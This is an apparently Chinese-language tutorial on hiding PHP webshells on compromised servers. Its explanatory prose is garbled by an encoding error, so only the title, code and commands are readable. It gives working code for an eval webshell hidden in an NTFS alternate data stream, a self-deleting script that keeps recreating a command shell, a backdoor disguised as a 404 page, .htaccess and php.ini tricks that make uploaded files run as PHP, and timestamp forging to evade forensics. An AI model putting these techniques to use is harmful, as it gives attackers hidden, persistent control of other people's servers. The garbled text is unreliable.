PHP后门隐藏的一些技巧总结
åè¨
妿æ³è®©èªå·±çWebshellççæ´ä¹ä¸äºï¼é¤äºWebshellè¦åæï¼è¿éè¦æ³¨æä¸äºéèæå·§ï¼æ¯å¦éèæä»¶ï¼ä¿®æ¹æ¶é´å±æ§ï¼éèæä»¶å容çã
1ãéèæä»¶
使ç¨Attrib +s +a +h +rå½ä»¤å°±æ¯æåæ¬çæä»¶å¤¹å¢å äºç³»ç»æä»¶å±æ§ãåæ¡£æä»¶å±æ§ãåªè¯»æä»¶å±æ§åéèæä»¶å±æ§ã
attrib +s +a +h +r shell.php //éèshell.phpæä»¶
2ãä¿®æ¹æä»¶æ¶é´å±æ§
å½ä½ è¯å¾å¨ä¸å æä»¶ä¸éèèªå·±æ°å建çæä»¶ï¼é£ä¹ï¼é¤äºå建ä¸ä¸ªè¿·ææ§çæä»¶åï¼è¿éè¦ä¿®æ¹æä»¶çä¿®æ¹æ¥æã
//ä¿®æ¹æ¶é´ä¿®æ¹ Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12" //è®¿é®æ¶é´ä¿®æ¹ Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12" //å建æ¶é´ä¿®æ¹ Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"
使ç¨å½ä»¤è·åæä»¶å±æ§
Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force
ä¿®æ¹æä¸ªæä»¶å¤¹ä¸æææä»¶çå建åä¿®æ¹æ¶é´
powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"
3ãå©ç¨ADSéèæä»¶å容
卿å¡å¨ä¸echoä¸ä¸ªæ°æ®æµæä»¶è¿å»ï¼æ¯å¦index.phpæ¯ç½é¡µæ£å¸¸æä»¶ï¼æä»¬å¯ä»¥è¿æ ·åæï¼
echo ^<?php @eval($_POST['chopper']);?^> > index.php:hidden.jpg
è¿æ ·åå°±çæäºä¸ä¸ªä¸å¯è§çshell hidden.jpgï¼å¸¸è§çæä»¶ç®¡çå¨ãtypeå½ä»¤ï¼dirå½ä»¤ãdelå½ä»¤åç°é½æ¾ä¸åºé£ä¸ªhidden.jpgçã
å©ç¨include彿°ï¼å°index.php:hidden.jpgè¿è¡hexç¼ç ï¼æè¿ä¸ªADSæä»¶includeè¿å»ï¼è¿æ ·åå°±å¯ä»¥æ£å¸¸è§£ææä»¬çä¸å¥è¯äºã
<?php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));?>
4ã䏿»é©¬
䏿»é©¬ä¼å é¤èªèº«ï¼ä»¥è¿ç¨çå½¢å¼å¾ªç¯å建éè½çåé¨ã
<?php set_time_limit(0); ignore_user_abort(1); unlink(__FILE__); //å é¤èªèº« while(1) { file_put_contents('shell.php','<?php @eval($_GET[cmd]);?>'); //å建shell.phpï¼è¿éæå¥½ç¨åæçä¸å¥è¯ sleep(10); //é´éæ¶é´ } ?>
å¤çæ¹å¼æç®åææçåæ³ï¼å°±æ¯é坿å¡å°±å¯ä»¥å é¤webshellæä»¶ã
5ãä¸é´ä»¶åé¨
å°ç¼è¯å¥½çsoæä»¶å¤å¶å°modulesæä»¶å¤¹ï¼å¯å¨å鍿¨¡åï¼éå¯Apacheãå½åéç¹å®åæ°çå符串è¿å»æ¶ï¼å³å¯è§¦ååé¨ã
github项ç®å°åï¼
https://github.com/VladRico/apache2_BackdoorMod
6ãå©ç¨404页é¢éèåé¨
404页é¢ä¸»è¦ç¨æ¥æåç¨æ·ä½éªï¼å¯ç¨æ¥éèå鍿件ã
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html> <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>
7ãå©ç¨ .htaccess æä»¶ææPHPåé¨
ä¸è¬.htaccesså¯ä»¥ç¨æ¥çåé¨åé对é»ååç»è¿ï¼å¨ä¸ä¼ ç®å½å建.htaccess æä»¶åå¥ï¼æ ééå¯å³å¯çæï¼ä¸ä¼ pngæä»¶è§£æã
AddType application/x-httpd-php .png
å¦å¤ï¼å¨.htaccess å å¥phpè§£æè§åï¼ææä»¶ååå«1çè§£ææphpï¼ä¸ä¼ 1.txtå³å¯è§£æã
<FilesMatch "1"> SetHandler application/x-httpd-php </FilesMatch>
8ãå©ç¨ php.ini éèå鍿件
php.ini ä¸å¯ä»¥æå®å¨ä¸»æä»¶æ§è¡ååèªå¨è§£æçæä»¶åç§°ï¼å¸¸ç¨äºé¡µé¢å¬å±å¤´é¨åå°¾é¨ï¼ä¹å¯ä»¥ç¨æ¥éèphpåé¨ã
ï¼å¨PHPææ¡£ä¹åèªå¨æ·»å æä»¶ã
auto_prepend_file = "c:\tmp.txt"
;å¨PHPææ¡£ä¹åèªå¨æ·»å æä»¶ã
auto_prepend_file = "c:\tmp.txt"
éé坿å¡çæï¼è®¿é®ä»»æä¸ä¸ªphpæä»¶å³å¯è·åwebshellã
æ»ç»
å°æ¤è¿ç¯å³äºPHPåé¨éèçä¸äºæå·§çæç« å°±ä»ç»å°è¿äº,æ´å¤ç¸å³PHPåé¨éèæå·§å容请æç´¢èæ¬ä¹å®¶ä»¥åçæç« æç»§ç»æµè§ä¸é¢çç¸å³æç« 叿大家以åå¤å¤æ¯æèæ¬ä¹å®¶ï¼